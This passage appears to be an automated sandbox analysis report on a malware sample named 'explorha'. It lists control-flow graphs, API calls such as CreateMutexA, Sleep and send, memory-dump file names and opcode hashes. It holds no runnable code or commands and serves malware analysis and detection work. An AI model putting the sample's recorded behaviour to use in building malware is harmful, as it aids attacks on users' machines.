                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID: invalid stoi argument$stoi argument out of range
                                                                                                      • API String ID: 1418687624-1606216832
                                                                                                      • Opcode ID: f9e43f14b3413fe1eb8de92eeeaa86eb6ab1c8bbe49878d425322a2b2dde8eaa
                                                                                                      • Instruction ID: 5bd817ea33aee4e4be95fefffcb158ed60f5d5fa310a50a8ee353e76da66c271
                                                                                                      • Opcode Fuzzy Hash: f9e43f14b3413fe1eb8de92eeeaa86eb6ab1c8bbe49878d425322a2b2dde8eaa
                                                                                                      • Instruction Fuzzy Hash: 2A119E32F00305CBDB24DBA8C841AA9B3B0FF44320F178469E849E7215EB31EC00CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:0.9%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:207
                                                                                                      Total number of Limit Nodes:9

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 330 897bbb-897bc8 call 89b922 333 897bea-897bfc call 897bfd ExitProcess 330->333 334 897bca-897bd8 GetPEB 330->334 334->333 336 897bda-897be9 334->336 336->333
                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,?,00897BBA,?,?,?,?,?,00898C0E), ref: 00897BF6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 7a13616d52db20c0f6ec97a91895ba59b7a6c1b37aaddbae0466288564486ccc
                                                                                                      • Instruction ID: 3314becb221b1d5ab5fadead3eef19ed06151ed43c8d88402b6d46a3ef059042
                                                                                                      • Opcode Fuzzy Hash: 7a13616d52db20c0f6ec97a91895ba59b7a6c1b37aaddbae0466288564486ccc
                                                                                                      • Instruction Fuzzy Hash: 35E08C300551086FCF35BB58CC59E983B5DFF91360F180820F8458A221DF25ED42C680
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 90f4060e9a532a49c4e951f6389f06a10192b6848312be6f63f7ca3307254e4f
                                                                                                      • Instruction ID: dcf1e10eb8de8def49b5768fbd45f7a9138936e1f3c345e13bbd8b514617e510
                                                                                                      • Opcode Fuzzy Hash: 90f4060e9a532a49c4e951f6389f06a10192b6848312be6f63f7ca3307254e4f
                                                                                                      • Instruction Fuzzy Hash: CD3148716102048BEF0CDF78DD88B6DBA6AFB85315F208219E454EB3D5DB7599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: e58ce484589153393961cc69b821f065f29b346d11ffa0d5b9939791905a080e
                                                                                                      • Instruction ID: 7b35d2033c852c23333d38888b3378c233e5c5868b8e40af2d9ed15a7848c571
                                                                                                      • Opcode Fuzzy Hash: e58ce484589153393961cc69b821f065f29b346d11ffa0d5b9939791905a080e
                                                                                                      • Instruction Fuzzy Hash: 3D3168717141048BEF0CDBACDD88BACB7B6FB85315F248218E454EB3C5DB7599808752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: ca2c8a9ca9e3acf8a1f32f953cfda7077cecfef1ddb16be6ccb0e32c546527b4
                                                                                                      • Instruction ID: e46d16370f9c48a0b244c5309a4d1a746977bd8a9db7613352962f2e9b6a407f
                                                                                                      • Opcode Fuzzy Hash: ca2c8a9ca9e3acf8a1f32f953cfda7077cecfef1ddb16be6ccb0e32c546527b4
                                                                                                      • Instruction Fuzzy Hash: 7B3168717001088BEF0CDB6CDDC9BACB766FB85324F208219E454EB3C5CB75A9808756
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 84 869c7e-869c9e 88 869ca0-869cac 84->88 89 869ccc-869ce8 84->89 90 869cc2-869cc9 call 87ecf8 88->90 91 869cae-869cbc 88->91 92 869d16-869d35 89->92 93 869cea-869cf6 89->93 90->89 91->90 94 86a405 91->94 98 869d37-869d43 92->98 99 869d63-86a3e6 call 879750 92->99 96 869d0c-869d13 call 87ecf8 93->96 97 869cf8-869d06 93->97 101 86a423-86a466 Sleep CreateMutexA 94->101 102 86a405 call 8982fa 94->102 96->92 97->94 97->96 105 869d45-869d53 98->105 106 869d59-869d60 call 87ecf8 98->106 102->101 105->94 105->106 106->99
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: a8b893d2e8a0c0a49730fec41c7ec6ebdda12a0daa0bad2acda6036ba12fd547
                                                                                                      • Instruction ID: 4e0fc406ff319fe4975bd0e1188d844d638b3b18518c52e6dc8ddf88a22c488c
                                                                                                      • Opcode Fuzzy Hash: a8b893d2e8a0c0a49730fec41c7ec6ebdda12a0daa0bad2acda6036ba12fd547
                                                                                                      • Instruction Fuzzy Hash: 023144727101048BEF0CDB78DD88BACBBB6FB85314F208619E454EB3D9DB7599808B56
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 115 869ee8-869f08 119 869f36-869f52 115->119 120 869f0a-869f16 115->120 121 869f54-869f60 119->121 122 869f80-869f9f 119->122 123 869f2c-869f33 call 87ecf8 120->123 124 869f18-869f26 120->124 125 869f76-869f7d call 87ecf8 121->125 126 869f62-869f70 121->126 127 869fa1-869fad 122->127 128 869fcd-86a3e6 call 879750 122->128 123->119 124->123 129 86a40f 124->129 125->122 126->125 126->129 135 869fc3-869fca call 87ecf8 127->135 136 869faf-869fbd 127->136 131 86a414-86a466 call 8982fa * 3 Sleep CreateMutexA 129->131 132 86a40f call 8982fa 129->132 132->131 135->128 136->129 136->135
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 2936c80cb5cba65236a074a3d4edef6fb1adcddcf3bce10a5cb48c3853092fa1
                                                                                                      • Instruction ID: 59363cc3ec6895f5d18eb4e10bbd4bedd126748c5468bcd0dd37cb5456d6bb74
                                                                                                      • Opcode Fuzzy Hash: 2936c80cb5cba65236a074a3d4edef6fb1adcddcf3bce10a5cb48c3853092fa1
                                                                                                      • Instruction Fuzzy Hash: 163148716001088BEF0CDB6CDD89B6DB772FB86314F248218E425FB3D6CB7599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 46267013cebf408646c60c549fc19bbbb89a2da148a81531fdbaffcaaa3cff0b
                                                                                                      • Instruction ID: 2dc9432c89345e2af055f4b263e723bb83bbfcc836b404f05dd0a6875ebbb251
                                                                                                      • Opcode Fuzzy Hash: 46267013cebf408646c60c549fc19bbbb89a2da148a81531fdbaffcaaa3cff0b
                                                                                                      • Instruction Fuzzy Hash: 5B11A8322142049BEB089F6CDE89B6CB765FB81315F10421AE818EB3C9CB79A5808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 281 86a326-86a33e 282 86a340-86a34c 281->282 283 86a36c-86a36e 281->283 284 86a362-86a369 call 87ecf8 282->284 285 86a34e-86a35c 282->285 286 86a370-86a377 283->286 287 86a379-86a381 call 8678b0 283->287 284->283 285->284 288 86a41e-86a458 call 8982fa Sleep CreateMutexA 285->288 290 86a3bb-86a3e6 call 879750 286->290 298 86a3b4-86a3b6 287->298 299 86a383-86a38b call 8678b0 287->299 301 86a45e-86a466 288->301 298->290 299->298 304 86a38d-86a395 call 8678b0 299->304 304->298 307 86a397-86a39f call 8678b0 304->307 307->298 310 86a3a1-86a3a9 call 8678b0 307->310 310->298 313 86a3ab-86a3b2 310->313 313->290
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 671922f1078a0ceb6448040c2e4685fe74c12e95f6bd05ad6ecc1048f5a501cf
                                                                                                      • Instruction ID: a27e467fd80c8805f45c48c1419b62b40e9d102c889aa25241e530895c48421c
                                                                                                      • Opcode Fuzzy Hash: 671922f1078a0ceb6448040c2e4685fe74c12e95f6bd05ad6ecc1048f5a501cf
                                                                                                      • Instruction Fuzzy Hash: 38215E313442059BFB1C6B6CCE8FB6C7663FB41705F254415E504EA3C5CA759D80CAAB
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 261 869e1f-869e2b 262 869e41-869e6a call 87ecf8 261->262 263 869e2d-869e3b 261->263 269 869e6c-869e78 262->269 270 869e98-86a3e6 call 879750 262->270 263->262 264 86a40a 263->264 266 86a423-86a466 Sleep CreateMutexA 264->266 267 86a40a call 8982fa 264->267 267->266 273 869e8e-869e95 call 87ecf8 269->273 274 869e7a-869e88 269->274 273->270 274->264 274->273
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 1f769d7a56ffa58c4e5cb018f09464d3afd17def9b0581f35bb038a33fd504d5
                                                                                                      • Instruction ID: f363094d6c49f387a18e8b5c93bd28c9b9ef272d5e3d06ec6c3e2e361443f7f0
                                                                                                      • Opcode Fuzzy Hash: 1f769d7a56ffa58c4e5cb018f09464d3afd17def9b0581f35bb038a33fd504d5
                                                                                                      • Instruction Fuzzy Hash: C72187323002049BEB0CDB6CDD897ACB766FF85311F24421DE418EB3D8CBB6A5808752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 314 89ee4f-89ee5a 315 89ee68-89ee6e 314->315 316 89ee5c-89ee66 314->316 318 89ee70-89ee71 315->318 319 89ee87-89ee98 RtlAllocateHeap 315->319 316->315 317 89ee9c-89eea7 call 898ba3 316->317 323 89eea9-89eeab 317->323 318->319 320 89ee9a 319->320 321 89ee73-89ee7a call 89b3e2 319->321 320->323 321->317 327 89ee7c-89ee85 call 89a459 321->327 327->317 327->319
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0089BE33,00000001,00000364,00000006,000000FF,?,008A045F,?,00000004,00000000,?,?), ref: 0089EE91
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 4a7445c6fe6718418ca29ae37ec269d450f59a894bb7aa7a30f0b95a3845c40e
                                                                                                      • Instruction ID: 4ba5df6ae60570d690653c069e1429baf3255095ee7701a90760bbdb86936bcc
                                                                                                      • Opcode Fuzzy Hash: 4a7445c6fe6718418ca29ae37ec269d450f59a894bb7aa7a30f0b95a3845c40e
                                                                                                      • Instruction Fuzzy Hash: BFF08232545229A69F21FAA69C05B6F7F99FF82770B1D8112BC18E6181CF71E80186E5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                      • String ID:
                                                                                                      • API String ID: 57040152-0
                                                                                                      • Opcode ID: de1a6e0a6c631cf3b8415fc4fd25764b4573f4c740a8be86f873fd866bed6720
                                                                                                      • Instruction ID: e9e38e6c009c3ee0ad944ab065100041e068efc5a6999c8281cb90c9d39b2413
                                                                                                      • Opcode Fuzzy Hash: de1a6e0a6c631cf3b8415fc4fd25764b4573f4c740a8be86f873fd866bed6720
                                                                                                      • Instruction Fuzzy Hash: 81A1F270900B069FDB21DB68C944B6ABBF8FF15310F018579E819DB281EB34EA04CBD2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _wcsrchr
                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                      • Opcode ID: ff3899e074aa9f45cb75f6b0988fa3778b30b0e791cd5b2dc2cdec6a82df5c68
                                                                                                      • Instruction ID: b05c6622cec164a70c840783034b95d437fbec275dcb87a659f4224268f2b486
                                                                                                      • Opcode Fuzzy Hash: ff3899e074aa9f45cb75f6b0988fa3778b30b0e791cd5b2dc2cdec6a82df5c68
                                                                                                      • Instruction Fuzzy Hash: 2201A577A04726692E143018AC026776798FBC3BB071D003EFC54F72C2EE94DC0141A9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID:
                                                                                                      • API String ID: 1418687624-0
                                                                                                      • Opcode ID: 6aacef2468bdef07b30213f636c3fa2632e2f699c1e2c417dafe1c515ee5e1ac
                                                                                                      • Instruction ID: 1cf2141e0495e21068f2d56a1dc026ee645a5e6b208ff28d57e194510385e35c
                                                                                                      • Opcode Fuzzy Hash: 6aacef2468bdef07b30213f636c3fa2632e2f699c1e2c417dafe1c515ee5e1ac
                                                                                                      • Instruction Fuzzy Hash: 5F81E472E003159BD7259B28CC45FAAB7B8FF09314F164679E919E7291EB31EC00CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _strrchr
                                                                                                      • String ID:
                                                                                                      • API String ID: 3213747228-0
                                                                                                      • Opcode ID: 4ac202cf43d41ffe8c944508c0ae86c9a1ebd8a60de72e44321f7679f8dba429
                                                                                                      • Instruction ID: d5b07ae4540bffbf3c9dc836fe3e5f6872c2b172b861e843d638aaa14b598de3
                                                                                                      • Opcode Fuzzy Hash: 4ac202cf43d41ffe8c944508c0ae86c9a1ebd8a60de72e44321f7679f8dba429
                                                                                                      • Instruction Fuzzy Hash: 8CB12232A046959FDF11EF68C881BAEBFA5FF56300F2C816AE841DB342D6349D01CB61
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • send.WS2_32(?,?,00000004,00000000), ref: 0086D43E
                                                                                                      • send.WS2_32(?,?,00000008,00000000), ref: 0086D47A
                                                                                                      • send.WS2_32(?,?,?,00000000), ref: 0086D4BC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: send
                                                                                                      • String ID:
                                                                                                      • API String ID: 2809346765-0
                                                                                                      • Opcode ID: 94994ec14a02205bda905b5202f1cbcf8f7ffc87dabc6c89ff29145ee448b742
                                                                                                      • Instruction ID: 40b276115e062521aa533d0c0ad9d3ded942d7fc71f643c03820cde1ecf44393
                                                                                                      • Opcode Fuzzy Hash: 94994ec14a02205bda905b5202f1cbcf8f7ffc87dabc6c89ff29145ee448b742
                                                                                                      • Instruction Fuzzy Hash: 8441D672F002149BDB288B7CCC85BADB7B5FF45324F1142A9E829E73D1DA30AD408B85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                      • String ID:
                                                                                                      • API String ID: 531285432-0
                                                                                                      • Opcode ID: 9447170ee4043f0a2577b2a236add53114fd9b68638756392da8c3af6b4d2b54
                                                                                                      • Instruction ID: b2324ec4dcd4b6fd0e6677b4478165a7fa83e76010b09ae45e1c1a518705ead0
                                                                                                      • Opcode Fuzzy Hash: 9447170ee4043f0a2577b2a236add53114fd9b68638756392da8c3af6b4d2b54
                                                                                                      • Instruction Fuzzy Hash: 44212C71A002199FDF04EFA8DC819BEBBB8FF48714F104059FA05E7265EA70ED418BA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • stoi argument out of range, xrefs: 0086DCFA
                                                                                                      • invalid stoi argument, xrefs: 0086DD04
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Mtx_unlock
                                                                                                      • String ID: invalid stoi argument$stoi argument out of range
                                                                                                      • API String ID: 1418687624-1606216832
                                                                                                      • Opcode ID: e547145f2ebd976fdabe355eec98bad8ee215013b6c89dd36c9b9c29f9c6d9a4
                                                                                                      • Instruction ID: 5bd817ea33aee4e4be95fefffcb158ed60f5d5fa310a50a8ee353e76da66c271
                                                                                                      • Opcode Fuzzy Hash: e547145f2ebd976fdabe355eec98bad8ee215013b6c89dd36c9b9c29f9c6d9a4
                                                                                                      • Instruction Fuzzy Hash: 2A119E32F00305CBDB24DBA8C841AA9B3B0FF44320F178469E849E7215EB31EC00CB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.5%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:2.3%
                                                                                                      Total number of Nodes:1279
                                                                                                      Total number of Limit Nodes:109
